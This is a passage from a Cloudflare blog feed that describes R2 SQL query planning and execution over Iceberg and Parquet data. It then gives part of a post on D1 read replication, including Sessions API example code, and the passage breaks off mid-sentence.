    <p>The pruning process is a top-down investigation that happens in three main steps:</p><ol><li><p><b>Table metadata and the current snapshot</b></p></li></ol><p>The planner begins by asking the catalog for the location of the current table metadata. This is a JSON file containing the table's current schema, partition specs, and a log of all historical snapshots. The planner then fetches the latest snapshot to work with.</p><p>2. <b>Manifest list and partition pruning</b></p><p>The current snapshot points to a single Iceberg manifest list. The planner reads this file and uses the partition-level stats for each entry to perform the first, most powerful pruning step, discarding any manifests whose partition value ranges don't satisfy the query. For a table partitioned by <code>day(event_timestamp</code>), the planner can use the min/max values in the manifest list to immediately discard any manifests that don't contain data for the days relevant to the query.</p><p>3.<b> Manifests and file-level pruning</b></p><p>For the remaining manifests, the planner reads each one to get a list of the actual Parquet data files. These manifest files contain more granular, column-level stats for each individual data file they track. This allows for a second pruning step, discarding entire data files that cannot possibly contain rows matching the query's filters.</p><p>4. <b>File row-group pruning</b></p><p>Finally, for the specific data files that are still candidates, the Query Planner uses statistics stored inside Parquet file's footers to skip over entire row groups.</p><p>The result of this multi-layer pruning is a precise list of Parquet files, and of row groups within those Parquet files. These become the query work units that are dispatched to the Query Execution system for processing.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7GKvgbex2vhIBqQ1G5UFjQ/2a99db7ae786b8e22a326bac0c9037d9/1.png" />
          </figure>
    <div>
      <h3>The Planning pipeline</h3>
      <a href="#the-planning-pipeline">
        
      </a>
    </div>
    <p>In R2 SQL, the multi-layer pruning we've described so far isn't a monolithic process. For a table with millions of files, the metadata can be too large to process before starting any real work. Waiting for a complete plan would introduce significant latency.</p><p>Instead, R2 SQL treats planning and execution together as a concurrent pipeline. The planner's job is to produce a stream of work units for the executor to consume as soon as they are available.</p><p>The planner’s investigation begins with two fetches to get a map of the table's structure: one for the table’s snapshot and another for the manifest list.</p>
    <div>
      <h4>Starting execution as early as possible</h4>
      <a href="#starting-execution-as-early-as-possible">
        
      </a>
    </div>
    <p>From that point on, the query is processed in a streaming fashion. As the Query Planner reads through the manifest files and subsequently the data files they point to and prunes them, it immediately emits any matching data files/row groups as work units to the execution queue.</p><p>This pipeline structure ensures the compute nodes can begin the expensive work of data I/O almost instantly, long before the planner has finished its full investigation.</p><p>On top of this pipeline model, the planner adds a crucial optimization: <b>deliberate ordering</b>. The manifest files are not streamed in an arbitrary sequence. Instead, the planner processes them in an order matching by the query's <code>ORDER BY</code> clause, guided by the metadata stats. This ensures that the data most likely to contain the desired results is processed first.</p><p>These two concepts work together to address query latency from both ends of the query pipeline.</p><p>The streamed planning pipeline lets us start crunching data as soon as possible, minimizing the delay before the first byte is processed. At the other end of the pipeline, the deliberate ordering of that work lets us finish early by finding a definitive result without scanning the entire dataset.</p><p>The next section explains the mechanics behind this "finish early" strategy.</p>
    <div>
      <h4>Stopping early: how to finish without reading everything</h4>
      <a href="#stopping-early-how-to-finish-without-reading-everything">
        
      </a>
    </div>
    <p>Thanks to the Query Planner streaming work units in an order matching the <code>ORDER BY </code>clause, the Query Execution system first processes the data that is most likely to be in the final result set.</p><p>This prioritization happens at two levels of the metadata hierarchy:</p><p><b>Manifest ordering</b>: The planner first inspects the manifest list. Using the partition stats for each manifest (e.g., the latest timestamp in that group of files), it decides which entire manifest files to stream first.</p><p><b>Parquet file ordering</b>: As it reads each manifest, it then uses the more granular column-level stats to decide the processing order of the individual Parquet files within that manifest.</p><p>This ensures a constantly prioritized stream of work units is sent to the execution engine. This prioritized stream is what allows us to stop the query early.</p><p>For instance, with a query like ... <code>ORDER BY timestamp DESC LIMIT 5</code>, as the execution engine processes work units and sends back results, the planner does two things concurrently:</p><p>It maintains a bounded heap of the best 5 results seen so far, constantly comparing new results to the oldest timestamp in the heap.</p><p>It keeps a "high-water mark" on the stream itself. Thanks to the metadata, it always knows the absolute latest timestamp of any data file that has not yet been processed.</p><p>The planner is constantly comparing the state of the heap to the water mark of the remaining stream. The moment the oldest timestamp in our Top 5 heap is newer than the high-water mark of the remaining stream, the entire query can be stopped.</p><p>At that point, we can prove no remaining work unit could possibly contain a result that would make it into the top 5. The pipeline is halted, and a complete, correct result is returned to the user, often after reading only a fraction of the potentially matching data.</p><p>Currently, R2 SQL supports ordering on columns that are part of the table's partition key only. This is a limitation we are working on lifting in the future.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5qN9TeEuRZJIidYXFictG/8a55cc6088be3abdc3b27878daa76e40/image4.png" />
          </figure>
    <div>
      <h3>Architecture</h3>
      <a href="#architecture">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3wkvnT24y5E0k5064cqu0T/939402d16583647986eec87617379900/image3.png" />
          </figure>
    <div>
      <h2>Query Execution</h2>
      <a href="#query-execution">
        
      </a>
    </div>
    <p>Query Planner streams the query work in bite-sized pieces called row groups. A single Parquet file usually contains multiple row groups, but most of the time only a few of them contain relevant data. Splitting query work into row groups allows R2 SQL to only read small parts of potentially multi-GB Parquet files.</p><p>The server that receives the user’s request and performs query planning assumes the role of query coordinator. It distributes the work across query workers and aggregates results before returning them to the user.</p><p>Cloudflare’s network is vast, and many servers can be in maintenance at the same time. The query coordinator contacts Cloudflare’s internal API to make sure only healthy, fully functioning servers are picked for query execution. Connections between coordinator and query worker go through <a href="https://www.cloudflare.com/en-gb/application-services/products/argo-smart-routing/"><u>Cloudflare Argo Smart Routing</u></a> to ensure fast, reliable connectivity.</p><p>Servers that receive query execution requests from the coordinator assume the role of query workers. Query workers serve as a point of horizontal scalability in R2 SQL. With a higher number of query workers, R2 SQL can process queries faster by distributing the work among many servers. That’s especially true for queries covering large amounts of files.</p><p>Both the coordinator and query workers run on Cloudflare’s distributed network, ensuring R2 SQL has plenty of compute power and I/O throughput to handle analytical workloads.</p><p>Each query worker receives a batch of row groups from the coordinator as well as an SQL query to run on it. Additionally, the coordinator sends serialized metadata about Parquet files containing the row groups. Thanks to that, query workers know exact byte offsets where each row group is located in the Parquet file without the need to read this information from R2.</p>
    <div>
      <h3>Apache DataFusion</h3>
      <a href="#apache-datafusion">
        
      </a>
    </div>
    <p>Internally, each query worker uses <a href="https://github.com/apache/datafusion"><u>Apache DataFusion</u></a> to run SQL queries against row groups. DataFusion is an open-source analytical query engine written in Rust. It is built around the concept of partitions. A query is split into multiple concurrent independent streams, each working on its own partition of data.</p><p>Partitions in DataFusion are similar to partitions in Iceberg, but serve a different purpose. In Iceberg, partitions are a way to physically organize data on object storage. In DataFusion, partitions organize in-memory data for query processing. While logically they are similar – rows grouped together based on some logic – in practice, a partition in Iceberg doesn’t always correspond to a partition in DataFusion.</p><p>DataFusion partitions map perfectly to the R2 SQL query worker’s data model because each row group can be considered its own independent partition. Thanks to that, each row group is processed in parallel.</p><p>At the same time, since row groups usually contain at least 1000 rows, R2 SQL benefits from vectorized execution. Each DataFusion partition stream can execute the SQL query on multiple rows in one go, amortizing the overhead of query interpretation.</p><p>There are two ends of the spectrum when it comes to query execution: processing all rows sequentially in one big batch and processing each individual row in parallel. Sequential processing creates a so-called “tight loop”, which is usually more CPU cache friendly. In addition to that, we can significantly reduce interpretation overhead, as processing a large number of rows at a time in batches means that we go through the query plan less often. Completely parallel processing doesn’t allow us to do these things, but makes use of multiple CPU cores to finish the query faster.</p><p>DataFusion’s architecture allows us to achieve a balance on this scale, reaping benefits from both ends. For each data partition, we gain better CPU cache locality and amortized interpretation overhead. At the same time, since many partitions are processed in parallel, we distribute the workload between multiple CPUs, cutting the execution time further.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Tis1F5C1x3x6sIyJLL8ju/aae094818b1b7f6f8d6f857305948fbd/image1.png" />
          </figure><p>In addition to the smart query execution model, DataFusion also provides first-class Parquet support.</p><p>As a file format, Parquet has multiple optimizations designed specifically for query engines. Parquet is a column-based format, meaning that each column is physically separated from others. This separation allows better compression ratios, but it also allows the query engine to read columns selectively. If the query only ever uses five columns, we can only read them and skip reading the remaining fifty. This massively reduces the amount of data we need to read from R2 and the CPU time spent on decompression.</p><p>DataFusion does exactly that. Using R2 ranged reads, it is able to read parts of the Parquet files containing the requested columns, skipping the rest.</p><p>DataFusion’s optimizer also allows us to push down any filters to the lowest levels of the query plan. In other words, we can apply filters right as we are reading values from Parquet files. This allows us to skip materialization of results we know for sure won’t be returned to the user, cutting the query execution time further.</p>
    <div>
      <h3>Returning query results</h3>
      <a href="#returning-query-results">
        
      </a>
    </div>
    <p>Once the query worker finishes computing results, it returns them to the coordinator through <a href="https://grpc.io/"><u>the gRPC protocol</u></a>.</p><p>R2 SQL uses <a href="https://arrow.apache.org/"><u>Apache Arrow</u></a> for internal representation of query results. Arrow is an in-memory format that efficiently represents arrays of structured data. It is also used by DataFusion during query execution to represent partitions of data.</p><p>In addition to being an in-memory format, Arrow also defines the <a href="https://arrow.apache.org/docs/format/Columnar.html#format-ipc"><u>Arrow IPC</u></a> serialization format. Arrow IPC isn’t designed for long-term storage of the data, but for inter-process communication, which is exactly what query workers and the coordinator do over the network. The query worker serializes all the results into the Arrow IPC format and embeds them into the gRPC response. The coordinator in turn deserializes results and can return to working on Arrow arrays.</p>
    <div>
      <h2>Future plans</h2>
      <a href="#future-plans">
        
      </a>
    </div>
    <p>While R2 SQL is currently quite good at executing filter queries, we also plan to rapidly add new capabilities over the coming months. This includes, but is not limited to, adding:</p><ul><li><p>Support for complex aggregations in a distributed and scalable fashion;</p></li><li><p>Tools to help provide visibility in query execution to help developers improve performance;</p></li><li><p>Support for many of the configuration options Apache Iceberg supports.</p></li></ul><p>In addition to that, we have plans to improve our developer experience by allowing users to query their R2 Data Catalogs using R2 SQL from the Cloudflare Dashboard.</p><p>Given Cloudflare’s distributed compute, network capabilities, and ecosystem of developer tools, we have the opportunity to build something truly unique here. We are exploring different kinds of indexes to make R2 SQL queries even faster and provide more functionality such as full text search, geospatial queries, and more. </p>
    <div>
      <h2>Try it now!</h2>
      <a href="#try-it-now">
        
      </a>
    </div>
    <p>It’s early days for R2 SQL, but we’re excited for users to get their hands on it. R2 SQL is available in open beta today! Head over to our<a href="https://developers.cloudflare.com/r2-sql/get-started/"> <u>getting started guide</u></a> to learn how to create an end-to-end data pipeline that processes and delivers events to an R2 Data Catalog table, which can then be queried with R2 SQL.</p><p>
We’re excited to see what you build! Come share your feedback with us on our<a href="http://discord.cloudflare.com/"> <u>Developer Discord</u></a>.</p><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Edge Computing]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">7znvjodLkg1AxYlR992it2</guid>
            <dc:creator>Yevgen Safronov</dc:creator>
            <dc:creator>Nikita Lapkov</dc:creator>
            <dc:creator>Jérôme Schneider</dc:creator>
        </item>
        <item>
            <title><![CDATA[Sequential consistency without borders: how D1 implements global read replication]]></title>
            <link>https://blog.cloudflare.com/d1-read-replication-beta/</link>
            <pubDate>Thu, 10 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ D1, Cloudflare’s managed SQL database, announces read replication beta. Here's a deep dive of the read replication implementation and how your queries can remain consistent across all regions. ]]></description>
            <content:encoded><![CDATA[ <p>Read replication of <a href="https://www.cloudflare.com/developer-platform/products/d1/">D1 databases</a> is in public beta!</p><p>D1 read replication makes read-only copies of your database available in multiple regions across Cloudflare’s network.  For busy, read-heavy applications like e-commerce websites, content management tools, and mobile apps:</p><ul><li><p>D1 read replication lowers average latency by routing user requests to read replicas in nearby regions.</p></li><li><p>D1 read replication increases overall throughput by offloading read queries to read replicas, allowing the primary database to handle more write queries.</p></li></ul><p>The main copy of your database is called the primary database and the read-only copies are called read replicas.  When you enable replication for a D1 database, the D1 service automatically creates and maintains read replicas of your primary database.  As your users make requests, D1 routes those requests to an appropriate copy of the database (either the primary or a replica) based on performance heuristics, the type of queries made in those requests, and the query consistency needs as expressed by your application.</p><p>All of this global replica creation and request routing is handled by Cloudflare at no additional cost.</p><p>To take advantage of read replication, your Worker needs to use the new D1 <a href="https://developers.cloudflare.com/d1/best-practices/read-replication/"><u>Sessions API</u></a>. Click the button below to run a Worker using D1 read replication with this <a href="https://github.com/cloudflare/templates/tree/main/d1-starter-sessions-api-template"><u>code example</u></a> to see for yourself!</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/templates/tree/main/d1-starter-sessions-api-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p>
    <div>
      <h2>D1 Sessions API</h2>
      <a href="#d1-sessions-api">
        
      </a>
    </div>
    <p>D1’s read replication feature is built around the concept of database <i>sessions</i>.  A session encapsulates all the queries representing one logical session for your application. For example, a session might represent all requests coming from a particular web browser or all requests coming from a mobile app used by one of your users. If you use sessions, your queries will use the appropriate copy of the D1 database that makes the most sense for your request, be that the primary database or a nearby replica.</p><p>The sessions implementation ensures <a href="https://jepsen.io/consistency/models/sequential"><u>sequential consistency</u></a> for all queries in the session, no matter what copy of the database each query is routed to.  The sequential consistency model has important properties like "<a href="https://jepsen.io/consistency/models/read-your-writes"><u>read my own writes</u></a>" and "<a href="https://jepsen.io/consistency/models/writes-follow-reads"><u>writes follow reads</u></a>," as well as a total ordering of writes. The total ordering of writes means that every replica will see transactions committed in the same order, which is exactly the behavior we want in a transactional system.  Said another way, sequential consistency guarantees that the reads and writes are executed in the order in which you write them in your code.</p><p>Some examples of consistency implications in real-world applications:</p><ul><li><p>You are using an online store and just placed an order (write query), followed by a visit to the account page to list all your orders (read query handled by a replica). You want the newly placed order to be listed there as well.</p></li><li><p>You are using your bank’s web application and make a transfer to your electricity provider (write query), and then immediately navigate to the account balance page (read query handled by a replica) to check the latest balance of your account, including that last payment.</p></li></ul><p>Why do we need the Sessions API? Why can we not just query replicas directly?</p><p>Applications using D1 read replication need the Sessions API because D1 runs on Cloudflare’s global network and there’s no way to ensure that requests from the same client get routed to the same replica for every request. For example, the client may switch from WiFi to a mobile network in a way that changes how their requests are routed to Cloudflare. Or the data center that handled previous requests could be down because of an outage or maintenance.</p><p>D1’s read replication is asynchronous, so it’s possible that when you switch between replicas, the replica you switch to lags behind the replica you were using. This could mean that, for example, the new replica hasn’t learned of the writes you just completed.  We could no longer guarantee useful properties like “read your own writes”.  In fact, in the presence of shifty routing, the only consistency property we could guarantee is that what you read had been committed at some point in the past (<a href="https://jepsen.io/consistency/models/read-committed"><u>read committed</u></a> consistency), which isn’t very useful at all!</p><p>Since we can’t guarantee routing to the same replica, we flip the script and use the information we get from the Sessions API to make sure whatever replica we land on can handle the request in a sequentially-consistent manner.</p><p>Here’s what the Sessions API looks like in a Worker:</p>
            <pre><code>export default {
  async fetch(request: Request, env: Env) {
    // A. Create the session.
    // When we create a D1 session, we can continue where we left off from a previous    
    // session if we have that session's last bookmark or use a constraint.
    const bookmark = request.headers.get('x-d1-bookmark') ?? 'first-unconstrained'
    const session = env.DB.withSession(bookmark)

    // Use this session for all our Workers' routes.
    const response = await handleRequest(request, session)

    // B. Return the bookmark so we can continue the session in another request.
    response.headers.set('x-d1-bookmark', session.getBookmark())

    return response
  }
}

async function handleRequest(request: Request, session: D1DatabaseSession) {
  const { pathname } = new URL(request.url)

  if (request.method === "GET" &amp;&amp; pathname === '/api/orders') {
    // C. Session read query.
    const { results } = await session.prepare('SELECT * FROM Orders').all()
    return Response.json(results)

  } else if (request.method === "POST" &amp;&amp; pathname === '/api/orders') {
    const order = await request.json&lt;Order&gt;()

    // D. Session write query.
    // Since this is a write query, D1 will transparently forward it to the primary.
    await session
      .prepare('INSERT INTO Orders VALUES (?, ?, ?)')
      .bind(order.orderId, order.customerId, order.quantity)
      .run()

    // E. Session read-after-write query.
    // In order for the application to be correct, this SELECT statement must see
    // the results of the INSERT statement above.
    const { results } = await session
      .prepare('SELECT * FROM Orders')
      .all()

    return Response.json(results)
  }

  return new Response('Not found', { status: 404 })
}</code></pre>
            <p>To use the Session API, you first need to create a session using the <code>withSession</code> method (<b><i>step A</i></b>).  The <code>withSession</code> method takes a bookmark as a parameter, or a constraint.  The provided constraint instructs D1 where to forward the first query of the session. Using <code>first-unconstrained</code> allows the first query to be processed by any replica without any restriction on how up-to-date it is. Using <code>first-primary</code> ensures that the first query of the session will be forwarded to the primary.</p>
            <pre><code>// A. Create the session.
const bookmark = request.headers.get('x-d1-bookmark') ?? 'first-unconstrained'
const session = env.DB.withSession(bookmark)</code></pre>
            <p>Providing an explicit bookmark instructs D1 that whichever database instance processes the query has to be at least as up-to-date as the provided bookmark (in case of a replica; the primary database is always up-to-date by definition).  Explicit bookmarks are how we can continue from previously-created sessions and maintain sequential consistency across user requests.</p><p>Once you’ve created the session, make queries like you normally would with D1.  The session object ensures that the queries you make are sequentially consistent with regards to each other.</p>
            <pre><code>// C. Session read query.
const { results } = await session.prepare('SELECT * FROM Orders').all()</code></pre>
            <p>For example, in the code example above, the session read query for listing the orders (<b><i>step C</i></b>) will return results that are at least as up-to-date as the bookmark used to create the session (<b><i>step A</i></b><i>)</i>.</p><p>More interesting is the write query to add a new order (<b><i>step D</i></b>) followed by the read query to list all orders (<b><i>step E</i></b>). Because both queries are executed on the same session, it is guaranteed that the read query will observe a database copy that includes the write query, thus maintaining sequential consistency.</p>
            <pre><code>// D. Session write query.
await session
  .prepare('INSERT INTO Orders VALUES (?, ?, ?)')
  .bind(order.orderId, order.customerId, order.quantity)
  .run()

// E. Session read-after-write query.
const { results } = await session
  .prepare('SELECT * FROM Orders')
  .all()</code></pre>
            <p>Note that we could make a single batch query to the primary including both the write and the list, but the benefit of using the new Sessions API is that you can use the extra read replica databases for your read queries and allow the primary database to handle more write queries.</p><p>The session object does the necessary bookkeeping to maintain the latest bookmark observed across all queries executed using that specific session, and always includes that latest bookmark in requests to D1. Note that any query executed without using the session object is not guaranteed to be sequentially consistent with the queries executed in the session.</p><p>When possible, we suggest continuing sessions across requests by including bookmarks in your responses to clients (<b><i>step B</i></b>), and having clients passing previously received bookmarks in their future requests.</p>
            <pre><code>// B. Return the bookmark so we can continue the session in another request.
response.headers.set('x-d1-bookmark', session.getBookmark())</code></pre>
            <p>This allows <i>all</i> of a client’s requests to be in the same session. You can do this by grabbing the session’s current bookmark at the end of the request (<code>session.getBookmark()</code>) and sending the bookmark in the response back to the client in HTTP headers, in HTTP cookies, or in the response body itself.</p>
    <div>
      <h3>Consistency with and without Sessions API</h3>
      <a href="#consistency-with-and-without-sessions-api">
        
      </a>
    </div>
    <p>In this section, we will explore the classic scenario of a read-after-write query to showcase how using the new D1 Sessions API ensures that we get sequential consistency and avoid any issues with inconsistent results in our application.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1zIBf3V1YIogYJKeWm1kDn/f484faf38cc0f8d7227f9db1fa386354/1.png" />
          </figure><p>The Client, a user Worker, sends a D1 write query that gets processed by the database primary and gets the results back. However, the subsequent read query ends up being processed by a database replica. If the database replica is lagging far enough behind the database primary, such that it does not yet include the first write query, then the returned results will be inconsistent, and probably incorrect for your application business logic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1w81ec5tNGWJ7sQyFBZQ6l/d487ccf225a097a0e48054d88df0ba1f/2.png" />
          </figure><p>Using the Sessions API fixes the inconsistency issue. The first write query is again processed by the database primary, and this time the response includes “<b>Bookmark 100</b>”. The session object will store this bookmark for you transparently.</p><p>The subsequent read query is processed by database replica as before, but now since the query includes the previously received “<b>Bookmark 100</b>”, the database replica will wait until its database copy is at least up-to-date as “<b>Bookmark 100</b>”. Only once it’s up-to-date, the read query will be processed and the results returned, including the replica’s latest bookmark “<b>Bookmark 104</b>”.</p><p>Notice that the returned bookmark for the read query is “<b>Bookmark 104</b>”, which is different from the one passed in the query request. This can happen if there were other writes from other client requests that also got replicated to the database replica in-between the two queries our own client executed.</p>
    <div>
      <h2>Enabling read replication</h2>
      <a href="#enabling-read-replication">
        
      </a>
    </div>
    <p>To start using D1 read replication:</p><ol><li><p>Update your Worker to use the D1 Sessions API to tell D1 what queries are part of the same database session. The Sessions API works with databases that do not have read replication enabled as well, so it’s safe to ship this code even before you enable replicas. Here’s <a href="http://developers.cloudflare.com/d1/best-practices/read-replication/"><u>an example</u></a>.</p></li><li><p><a href="https://developers.cloudflare.com/d1/best-practices/read-replication/#enable-read-replication"><u>Enable replicas</u></a> for your database via <a href="https://dash.cloudflare.com/?to=/:account/workers/d1"><u>Cloudflare dashboard</u></a> &gt; Select D1 database &gt; Settings.</p></li></ol><p>D1 read replication is built into D1, and you don’t pay extra storage or compute costs for replicas. You incur the exact same D1 usage with or without replicas, based on <code>rows_read</code> and <code>rows_written</code> by your queries. Unlike other traditional database systems with replication, you don’t have to manually create replicas, including where they run, or decide how to route requests between the primary database and read replicas. Cloudflare handles this when using the Sessions API while ensuring sequential consistency.</p><p>Since D1 read replication is in beta, we recommend trying D1 read replication on a non-production database first, and migrate to your production workloads after validating read replication works for your use case.</p><p>If you don’t have a D1 database and want to try out D1 read replication, <a href="https://dash.cloudflare.com/?to=/:account/workers/d1/create"><u>create a test database</u></a> in the Cloudflare dashboard.</p>
    <div>
      <h3>Observing your replicas</h3>
      <a href="#observing-your-replicas">
        
      </a>
    </div>
    <p>Once you’ve enabled D1 read replication, read queries will start to be processed by replica database instances. The response of each query includes information in the nested <code>meta</code> object relevant to read replication, like <code>served_by_region</code> and <code>served_by_primary</code>. The first denotes the region of the database instance that processed the query, and the latter will be <code>true</code> if-and-only-if your query was processed by the primary database instance.</p><p>In addition, the <a href="https://dash.cloudflare.com/?to=/:account/workers/d1/"><u>D1 dashboard overview</u></a> for a database now includes information about the database instances handling your queries. You can see how many queries are handled by the primary instance or by a replica, and a breakdown of the queries processed by region. The example screenshots below show graphs displaying the number of queries executed  and number of rows read by each region.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ChIlqQ5xgJfiftOHw9Egg/b583d00d22dcea60e7439dfbfa1761df/image10.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Zze5y22759fOIYPOqrK1Y/6cd3c684006ca8234db20924cae8b960/image1.png" />
          </figure>
    <div>
      <h2>Under the hood: how D1 read replication is implemented</h2>
      <a href="#under-the-hood-how-d1-read-replication-is-implemented">
        
      </a>
    </div>
    <p>D1 is implemented on top of SQLite-backed Durable Objects running on top of Cloudflare’s <a href="https://blog.cloudflare.com/sqlite-in-durable-objects/#under-the-hood-storage-relay-service"><u>Storage Relay Service</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GWWL8goIzrGTmkH54O416/aabd47fcd94bfc73492556b19ac6069f/5.png" />
          </figure><p>D1 is structured with a 3-layer architecture.  First is the binding API layer that runs in the customer’s Worker.  Next is a stateless Worker layer that routes requests based on database ID to a layer of Durable Objects that handle the actual SQL operations behind D1.  This is similar to how <a href="https://developers.cloudflare.com/durable-objects/what-are-durable-objects/#durable-objects-in-cloudflare"><u>most applications using Cloudflare Workers and Durable Objects are structured</u></a>.</p><p>For a non-replicated database, there is exactly one Durable Object per database.  When a user’s Worker makes a request with the D1 binding for the database, that request is first routed to a D1 Worker running in the same location as the user’s Worker.  The D1 Worker figures out which D1 Durable Object backs the user’s D1 database and fetches an RPC stub to that Durable Object.  The Durable Objects routing layer figures out where the Durable Object is located, and opens an RPC connection to it.  Finally, the D1 Durable Object then handles the query on behalf of the user’s Worker using the Durable Objects SQL API.</p><p>In the Durable Objects SQL API, all queries go to a SQLite database on the local disk of the server where the Durable Object is running.  Durable Objects run <a href="https://www.sqlite.org/wal.html"><u>SQLite in WAL mode</u></a>.  In WAL mode, every write query appends to a write-ahead log (the WAL).  As SQLite appends entries to the end of the WAL file, a database-specific component called the Storage Relay Service <i>leader</i> synchronously replicates the entries to 5 <i>durability followers</i> on servers in different datacenters.  When a quorum (at least 3 out of 5) of the durability followers acknowledge that they have safely stored the data, the leader allows SQLite’s write queries to commit and opens the Durable Object’s output gate, so that the Durable Object can respond to requests.</p><p>Our implementation of WAL mode allows us to have a complete log of all of the committed changes to the database. This enables a couple of important features in SQLite-backed Durable Objects and D1:</p><ul><li><p>We identify each write with a <a href="https://en.wikipedia.org/wiki/Lamport_timestamp"><u>Lamport timestamp</u></a> we call a <a href="https://developers.cloudflare.com/d1/reference/time-travel/#bookmarks"><u>bookmark</u></a>.</p></li><li><p>We construct databases anywhere in the world by downloading all of the WAL entries from cold storage and replaying each WAL entry in order.</p></li><li><p>We implement <a href="https://developers.cloudflare.com/d1/reference/time-travel/"><u>Point-in-time recovery (PITR)</u></a> by replaying WAL entries up to a specific bookmark rather than to the end of the log.</p></li></ul><p>Unfortunately, having the main data structure of the database be a log is not ideal.  WAL entries are in write order, which is often neither convenient nor fast.  In order to cut down on the overheads of the log, SQLite <i>checkpoints</i> the log by copying the WAL entries back into the main database file.  Read queries are serviced directly by SQLite using files on disk — either the main database file for checkpointed queries, or the WAL file for writes more recent than the last checkpoint.  Similarly, the Storage Relay Service snapshots the database to cold storage so that we can replay a database by downloading the most recent snapshot and replaying the WAL from there, rather than having to download an enormous number of individual WAL entries.</p><p>WAL mode is the foundation for implementing read replication, since we can stream writes to locations other than cold storage in real time.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ezp8gcf3gXqkvumzufGfP/1a54fc6f434290968c7e695c2e5bb0c9/6.png" />
          </figure><p>We implemented read replication in 5 major steps.</p><p>First, we made it possible to make replica Durable Objects with a read-only copy of the database.  These replica objects boot by fetching the latest snapshot and replaying the log from cold storage to whatever bookmark primary database’s leader last committed. This basically gave us point-in-time replicas, since without continuous updates, the replicas never updated until the Durable Object restarted.</p><p>Second, we registered the replica leader with the primary’s leader so that the primary leader sends the replicas every entry written to the WAL at the same time that it sends the WAL entries to the durability followers.  Each of the WAL entries is marked with a bookmark that uniquely identifies the WAL entry in the sequence of WAL entries.  We’ll use the bookmark later.</p><p>Note that since these writes are sent to the replicas <i>before</i> a quorum of durability followers have confirmed them, the writes are actually unconfirmed writes, and the replica leader must be careful to keep the writes hidden from the replica Durable Object until they are confirmed.  The replica leader in the Storage Relay Service does this by implementing enough of SQLite’s <a href="https://www.sqlite.org/walformat.html#the_wal_index_file_format"><u>WAL-index protocol</u></a>, so that the unconfirmed writes coming from the primary leader look to SQLite as though it’s just another SQLite client doing unconfirmed writes.  SQLite knows to ignore the writes until they are confirmed in the log.  The upshot of this is that the replica leader can write WAL entries to the SQLite WAL <i>immediately,</i> and then “commit” them when the primary leader tells the replica that the entries have been confirmed by durability followers.</p><p>One neat thing about this approach is that writes are sent from the primary to the replica as quickly as they are generated by the primary, helping to minimize lag between replicas.  In theory, if the write query was proxied through a replica to the primary, the response back to the replica will arrive at almost the same time as the message that updates the replica.  In such a case, it looks like there’s no replica lag at all!</p><p>In practice, we find that replication is really fast.  Internally, we measure <i>confirm lag</i>, defined as the time from when a primary confirms a change to when the replica confirms a change.  The table below shows the confirm lag for two D1 databases whose primaries are in different regions.</p><div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
                    <td>
                        <p><br /><span><span>Replica Region</span></span></p>
                    </td>
                    <td>
                        <p><span><span>Database A</span></span></p>
                        <p><span><span>(Primary region: ENAM)</span></span></p>
                    </td>
                    <td>
                        <p><span><span>Database B</span></span><br /><span><span>(Primary region: WNAM)</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>ENAM</span></span></p>
                    </td>
                    <td>
                        <p><span><span>N/A</span></span></p>
                    </td>
                    <td>
                        <p><span><span>30 ms</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>WNAM</span></span></p>
                    </td>
                    <td>
                        <p><span><span>45 ms</span></span></p>
                    </td>
                    <td>
                        <p><span><span>N/A</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>WEUR</span></span></p>
                    </td>
                    <td>
                        <p><span><span>55 ms</span></span></p>
                    </td>
                    <td>
                        <p><span><span>75 ms</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>EEUR</span></span></p>
                    </td>
                    <td>
                        <p><span><span>67 ms</span></span></p>
                    </td>
                    <td>
                        <p><span><span>75 ms</span></span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </figure>
</div><p><sup><i>Confirm lag for 2 replicated databases.  N/A means that we have no data for this combination.  The region abbreviations are the same ones used for </i></sup><a href="https://developers.cloudflare.com/durable-objects/reference/data-location/#supported-locations-1"><sup><i><u>Durable Object location hints</u></i></sup></a><sup><i>.</i></sup></p><p>The table shows that confirm lag is correlated with the network round-trip time between the data centers hosting the primary databases and their replicas.  This is clearly visible in the difference between the confirm lag for the European replicas of the two databases.  As airline route planners know, EEUR is <a href="http://www.gcmap.com/mapui?P=ewr-lhr,+ewr-waw"><u>appreciably further away</u></a> from ENAM than WEUR is, but from WNAM, both European regions (WEUR and EEUR) are <a href="http://www.gcmap.com/mapui?P=sjc-lhr,+sjc-waw"><u>about equally as far away</u></a>.  We see that in our replication numbers.</p><p>The exact placement of the D1 database in the region matters too.  Regions like ENAM and WNAM are quite large in themselves.  Database A’s placement in ENAM happens to be further away from most data centers in WNAM compared to database B’s placement in WNAM relative to the ENAM data centers.  As such, database B sees slightly lower confirm lag.</p><p>Try as we might, we can’t beat the speed of light!</p><p>Third, we updated the Durable Object routing system to be aware of Durable Object replicas.  When read replication is enabled on a Durable Object, two things happen.  First, we 